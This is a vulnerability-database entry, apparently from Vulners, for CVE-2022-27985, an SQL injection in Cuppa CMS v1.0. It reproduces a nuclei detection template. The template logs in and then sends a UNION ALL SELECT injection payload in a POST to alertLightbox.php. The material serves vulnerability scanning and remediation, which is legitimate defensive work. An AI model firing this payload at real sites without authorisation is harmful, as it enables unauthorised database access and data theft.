Lucene search
K

Cuppa CMS v1.0 - SQL injection

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Cuppa CMS v1.0 SQL injection via /administrator/alerts/alertLightbox.php, leads to unauthorized access, data leakage, potential compromise of entire system. Upgrade to latest version or apply provided patch

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-27985
26 Apr 202214:15
attackerkb
Circl
CVE-2022-27985
26 Apr 202218:37
circl
CNNVD
CuppaCMS SQL注入漏洞
26 Apr 202200:00
cnnvd
CNVD
CuppaCMS SQL Injection Vulnerability (CNVD-2022-63581)
28 Apr 202200:00
cnvd
CVE
CVE-2022-27985
26 Apr 202213:58
cve
Cvelist
CVE-2022-27985
26 Apr 202213:58
cvelist
NVD
CVE-2022-27985
26 Apr 202214:15
nvd
OSV
CVE-2022-27985
26 Apr 202214:15
osv
Prion
Sql injection
26 Apr 202214:15
prion
RedhatCVE
CVE-2022-27985
7 Jan 202609:49
redhatcve
Rows per page
id: CVE-2022-27985

info:
  name: Cuppa CMS v1.0 - SQL injection
  author: theamanrawat
  severity: critical
  description: |
    CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27985
    - http://cuppa.com
    - http://www.cuppacms.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-27985
    cwe-id: CWE-89
    epss-score: 0.06922
    epss-percentile: 0.93296
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms,vuln
variables:
  num: '999999999'

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /alerts/alertLightbox.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220025195110808412f332627b9a61afdf5796d5b80e9363b77b5e42845b904945e022100c212f55d5352d31b6e2ece4611a42912cfd6c0f87c72e54beae09d492fb13c2d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.06922
20